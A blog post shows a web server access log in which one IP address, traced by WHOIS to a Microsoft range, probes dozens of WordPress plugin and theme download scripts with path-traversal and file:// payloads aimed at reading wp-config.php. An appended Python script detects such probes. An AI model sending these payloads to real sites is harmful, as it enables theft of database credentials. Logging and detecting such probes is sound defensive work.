Suspicious access to my web pages from Microsoft

Suspicious access to my web pages happens all the time, so when it gets in the way of log analysis I block the entire IP address range at the firewall.

Today, too, the usual nuisance access showed up, as shown below. From left to right: line number (not part of the log), timestamp, IP address, URL, referrer.

   557	[21/Aug/2016:04:55:29] - - 138.91.157.231    "GET //wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 404 1041       "-"
   558	[21/Aug/2016:04:55:30] - - 138.91.157.231    "GET //wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php HTTP/1.1" 404 1041       "-"
   559	[21/Aug/2016:04:55:30] - - 138.91.157.231    "GET //wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php HTTP/1.1" 404 1041       "-"
   560	[21/Aug/2016:04:55:31] - - 138.91.157.231    "GET //wp-content/themes/TheLoft/download.php?file=../../../wp-config.php HTTP/1.1" 404 1041       "-"
   561	[21/Aug/2016:04:55:32] - - 138.91.157.231    "GET //wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php HTTP/1.1" 404 1041       "-"
   562	[21/Aug/2016:04:55:32] - - 138.91.157.231    "GET //wp-content/themes/felis/download.php?file=../wp-config.php HTTP/1.1" 404 1041       "-"
   563	[21/Aug/2016:04:55:33] - - 138.91.157.231    "GET //wp-content/themes/epic/includes/download.php?file=wp-config.php HTTP/1.1" 404 1041       "-"
   564	[21/Aug/2016:04:55:33] - - 138.91.157.231    "GET //wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 404 1041       "-"
   565	[21/Aug/2016:04:55:34] - - 138.91.157.231    "GET //wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 404 1041       "-"
   566	[21/Aug/2016:04:55:34] - - 138.91.157.231    "GET //wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 404 1041       "-"
   567	[21/Aug/2016:04:55:35] - - 138.91.157.231    "GET //wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php HTTP/1.1" 404 1041       "-"
   568	[21/Aug/2016:04:55:35] - - 138.91.157.231    "GET //wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php HTTP/1.1" 404 1041       "-"
   569	[21/Aug/2016:04:55:36] - - 138.91.157.231    "GET //wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php HTTP/1.1" 404 1041       "-"
   570	[21/Aug/2016:04:55:36] - - 138.91.157.231    "GET //wp-content/themes/lote27/download.php?download=../../../wp-config.php HTTP/1.1" 404 1041       "-"
   571	[21/Aug/2016:04:55:36] - - 138.91.157.231    "GET //wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1" 404 1041       "-"
   572	[21/Aug/2016:04:55:37] - - 138.91.157.231    "GET //wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php HTTP/1.1" 404 1041       "-"
   573	[21/Aug/2016:04:55:37] - - 138.91.157.231    "GET //wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php HTTP/1.1" 404 1041       "-"
   574	[21/Aug/2016:04:55:38] - - 138.91.157.231    "GET //wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php HTTP/1.1" 404 1041       "-"
   575	[21/Aug/2016:04:55:39] - - 138.91.157.231    "GET //wp-content/plugins/history-collection/download.php?var=../../../wp-config.php HTTP/1.1" 404 1041       "-"
   576	[21/Aug/2016:04:55:39] - - 138.91.157.231    "GET //wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php HTTP/1.1" 404 1041       "-"
   577	[21/Aug/2016:04:55:39] - - 138.91.157.231    "GET //wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php HTTP/1.1" 404 1041       "-"
   578	[21/Aug/2016:04:55:40] - - 138.91.157.231    "GET //wp-content/force-download.php?file=../wp-config.php HTTP/1.1" 404 1041       "-"
   579	[21/Aug/2016:04:55:40] - - 138.91.157.231    "GET //wp-content/plugins/ibs-mappro/lib/download.php?file=../../../../wp-config.php HTTP/1.1" 404 1041       "-"
   580	[21/Aug/2016:04:55:40] - - 138.91.157.231    "GET //wp-content/themes/SMWF/inc/download.php?file=../wp-config.php HTTP/1.1" 404 1041       "-"
   581	[21/Aug/2016:04:55:41] - - 138.91.157.231    "GET //force-download.php?file=../wp-config.php HTTP/1.1" 404 1041       "-"
   582	[21/Aug/2016:04:55:41] - - 138.91.157.231    "GET //wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr HTTP/1.1" 404 1041       "-"
   583	[21/Aug/2016:04:55:41] - - 138.91.157.231    "GET //wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php HTTP/1.1" 404 1041       "-"
   584	[21/Aug/2016:04:55:42] - - 138.91.157.231    "GET //wp-content/themes/markant/download.php?file=../../wp-config.php HTTP/1.1" 404 1041       "-"
   585	[21/Aug/2016:04:55:42] - - 138.91.157.231    "GET //wp-content/themes/yakimabait/download.php?file=./wp-config.php HTTP/1.1" 404 1041       "-"
   586	[21/Aug/2016:04:55:43] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 301 -       "-"
   587	[21/Aug/2016:04:55:47] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 404 50776       "-"
   588	[21/Aug/2016:04:55:52] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php HTTP/1.1" 301 -       "-"
   589	[21/Aug/2016:04:55:55] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php HTTP/1.1" 404 50776       "-"
   590	[21/Aug/2016:04:55:59] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php HTTP/1.1" 301 -       "-"
   591	[21/Aug/2016:04:56:01] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php HTTP/1.1" 404 50776       "-"
   592	[21/Aug/2016:04:56:05] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/TheLoft/download.php?file=../../../wp-config.php HTTP/1.1" 301 -       "-"
   593	[21/Aug/2016:04:56:07] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php HTTP/1.1" 404 50776       "-"
   594	[21/Aug/2016:04:56:12] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/felis/download.php?file=../wp-config.php HTTP/1.1" 301 -       "-"
   595	[21/Aug/2016:04:56:14] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/felis/download.php?file=../wp-config.php HTTP/1.1" 404 50776       "-"
   596	[21/Aug/2016:04:56:18] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php HTTP/1.1" 301 -       "-"
   597	[21/Aug/2016:04:56:21] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php HTTP/1.1" 404 50776       "-"
   598	[21/Aug/2016:04:56:25] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 301 -       "-"
   599	[21/Aug/2016:04:56:27] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 404 50776       "-"
   600	[21/Aug/2016:04:56:31] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/epic/includes/download.php?file=wp-config.php HTTP/1.1" 301 -       "-"
   601	[21/Aug/2016:04:56:33] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/epic/includes/download.php?file=wp-config.php HTTP/1.1" 404 50776       "-"
   602	[21/Aug/2016:04:56:45] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 301 -       "-"
   603	[21/Aug/2016:04:56:47] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 404 50776       "-"
   604	[21/Aug/2016:04:56:51] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 301 -       "-"
   605	[21/Aug/2016:04:56:54] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 404 50776       "-"
   606	[21/Aug/2016:04:56:58] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php HTTP/1.1" 301 -       "-"
   607	[21/Aug/2016:04:57:00] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php HTTP/1.1" 404 50776       "-"
   608	[21/Aug/2016:04:57:09] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php HTTP/1.1" 301 -       "-"
   609	[21/Aug/2016:04:57:11] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php HTTP/1.1" 404 50776       "-"
   610	[21/Aug/2016:04:57:15] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/lote27/download.php?download=../../../wp-config.php HTTP/1.1" 301 -       "-"
   611	[21/Aug/2016:04:57:18] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/lote27/download.php?download=../../../wp-config.php HTTP/1.1" 404 50776       "-"
   612	[21/Aug/2016:04:57:22] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1" 301 -       "-"
   613	[21/Aug/2016:04:57:24] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1" 404 50776       "-"
   614	[21/Aug/2016:04:57:28] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php HTTP/1.1" 301 -       "-"
   615	[21/Aug/2016:04:57:31] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php HTTP/1.1" 404 50776       "-"
   616	[21/Aug/2016:04:57:35] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php HTTP/1.1" 301 -       "-"
   617	[21/Aug/2016:04:57:37] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php HTTP/1.1" 404 50776       "-"
   618	[21/Aug/2016:04:57:41] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php HTTP/1.1" 301 -       "-"
   619	[21/Aug/2016:04:57:46] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php HTTP/1.1" 404 50776       "-"
   620	[21/Aug/2016:04:57:50] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php HTTP/1.1" 301 -       "-"
   621	[21/Aug/2016:04:57:52] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php HTTP/1.1" 404 50776       "-"
   622	[21/Aug/2016:04:57:56] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php HTTP/1.1" 301 -       "-"
   623	[21/Aug/2016:04:57:59] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php HTTP/1.1" 404 50776       "-"
   624	[21/Aug/2016:04:58:03] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php HTTP/1.1" 301 -       "-"
   625	[21/Aug/2016:04:58:05] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php HTTP/1.1" 404 50776       "-"
   626	[21/Aug/2016:04:58:09] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/plugins/history-collection/download.php?var=../../../wp-config.php HTTP/1.1" 301 -       "-"
   627	[21/Aug/2016:04:58:12] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php HTTP/1.1" 404 50776       "-"
   628	[21/Aug/2016:04:58:15] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/SMWF/inc/download.php?file=../wp-config.php HTTP/1.1" 301 -       "-"
   629	[21/Aug/2016:04:58:18] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php HTTP/1.1" 404 50776       "-"
   630	[21/Aug/2016:04:58:22] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/force-download.php?file=../wp-config.php HTTP/1.1" 301 -       "-"
   631	[21/Aug/2016:04:58:24] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/force-download.php?file=../wp-config.php HTTP/1.1" 404 50776       "-"
   632	[21/Aug/2016:04:58:28] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/plugins/ibs-mappro/lib/download.php?file=../../../../wp-config.php HTTP/1.1" 301 -       "-"
   633	[21/Aug/2016:04:58:31] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/plugins/ibs-mappro/lib/download.php?file=../../../../wp-config.php HTTP/1.1" 404 50776       "-"
   634	[21/Aug/2016:04:58:35] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//force-download.php?file=../wp-config.php HTTP/1.1" 301 -       "-"
   635	[21/Aug/2016:04:58:43] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/force-download.php?file=../wp-config.php HTTP/1.1" 404 50776       "-"
   636	[21/Aug/2016:04:58:48] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr HTTP/1.1" 301 -       "-"
   637	[21/Aug/2016:04:58:51] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr HTTP/1.1" 404 50776       "-"
   638	[21/Aug/2016:04:58:55] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php HTTP/1.1" 301 -       "-"
   639	[21/Aug/2016:04:58:57] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php HTTP/1.1" 404 50776       "-"
   640	[21/Aug/2016:04:59:02] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/markant/download.php?file=../../wp-config.php HTTP/1.1" 301 -       "-"
   641	[21/Aug/2016:04:59:05] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/markant/download.php?file=../../wp-config.php HTTP/1.1" 404 50776       "-"
   642	[21/Aug/2016:04:59:09] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/yakimabait/download.php?file=./wp-config.php HTTP/1.1" 301 -       "-"
   643	[21/Aug/2016:04:59:11] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/yakimabait/download.php?file=./wp-config.php HTTP/1.1" 404 50776       "-"

Looking up which country this IP, "138.91.157.231", belongs to ...

NetRange:       138.91.0.0 - 138.91.255.255
CIDR:           138.91.0.0/16
NetName:        MICROSOFT
NetHandle:      NET-138-91-0-0-1
Parent:         NET138 (NET-138-0-0-0-0)
NetType:        Direct Assignment
OriginAS:
Organization:   Microsoft Corp (MSFT-Z)
RegDate:        2011-06-22
Updated:        2013-08-20
Ref:            https://whois.arin.net/rest/net/NET-138-91-0-0-1

It was Microsoft.

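I don't think Microsoft as a company is doing this sort of thing, but there are people in there who do. It could also be an affiliated company or a customer that the IP address range has been leased to.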

I considered contacting abuse, but companies like this usually don't send back so much as a "Thank you", so I'm skipping the report. I'll just expose it here.
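The requests in the log above all try to make a download-style script return wp-config.php through a query parameter. The following is an added example, not part of the original post: it picks such requests out of a log in the same layout, groups them by source IP, counts any that were answered with a 2xx status, and matches the source against the WHOIS range shown above. The function names, the threshold and the last three sample lines are assumptions made for this example.

```python
import ipaddress
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Layout used in the post: [timestamp] - - IP "request line" status size "referer"
LINE_RE = re.compile(r'\[([^\]]+)\] - - (?P<ip>\S+)\s+"\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
SENSITIVE_FILES = ("wp-config.php",)
WHOIS_RANGES = ["138.91.0.0/16"]  # range taken from the WHOIS output in the post

# First four lines are copied from the post's log; the last three are constructed
# for this example (documentation addresses 192.0.2.10 and 198.51.100.7).
SAMPLE_LOG = """\
[21/Aug/2016:04:55:29] - - 138.91.157.231    "GET //wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 404 1041       "-"
[21/Aug/2016:04:55:31] - - 138.91.157.231    "GET //wp-content/themes/TheLoft/download.php?file=../../../wp-config.php HTTP/1.1" 404 1041       "-"
[21/Aug/2016:04:55:37] - - 138.91.157.231    "GET //wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php HTTP/1.1" 404 1041       "-"
[21/Aug/2016:04:55:41] - - 138.91.157.231    "GET //wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr HTTP/1.1" 404 1041       "-"
[21/Aug/2016:05:01:02] - - 192.0.2.10    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/ HTTP/1.1" 200 50776       "-"
[21/Aug/2016:05:01:09] - - 192.0.2.10    "GET /download.php?file=manual.pdf HTTP/1.1" 200 1041       "-"
[21/Aug/2016:05:02:13] - - 198.51.100.7    "GET /download.php?file=%2e%2e%2fwp-config.php HTTP/1.1" 200 3312       "-"
"""

def is_file_read_probe(target):
    """True if any query value names a sensitive file or tries to leave the directory."""
    # Split on '?' by hand: urlsplit() would read the leading '//' as a host name.
    query = target.partition("?")[2]
    for _, value in parse_qsl(query):  # parse_qsl percent-decodes each value
        v = value.lower()
        if v.endswith(SENSITIVE_FILES) or "../" in v or v.startswith("file://"):
            return True
    return False

def summarize(log_text, min_probes=3):
    """Per source IP: probes, distinct scripts tried, probes answered 2xx, WHOIS range."""
    stats = defaultdict(lambda: {"probes": 0, "scripts": set(), "served": 0})
    for line in log_text.splitlines():
        m = LINE_RE.search(line)  # search() tolerates a leading line-number column
        if not m or not is_file_read_probe(m["target"]):
            continue
        s = stats[m["ip"]]
        s["probes"] += 1
        s["scripts"].add(m["target"].partition("?")[0])
        s["served"] += m["status"].startswith("2")  # 2xx: the file may have been returned
    report = {}
    for ip, s in stats.items():
        if s["probes"] < min_probes and not s["served"]:
            continue  # a single miss is not worth reporting
        addr = ipaddress.ip_address(ip)
        rng = next((r for r in WHOIS_RANGES if addr in ipaddress.ip_network(r)), None)
        report[ip] = {"probes": s["probes"], "scripts": len(s["scripts"]),
                      "served": s["served"], "range": rng}
    return report

if __name__ == "__main__":
    for ip, row in summarize(SAMPLE_LOG).items():
        print(ip, row)
```

A non-zero "served" count is the case to look at first: every probe in the post's log got 404 or 301, but a 2xx answer to one of these requests would mean the script responded and the configuration file may have been disclosed.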
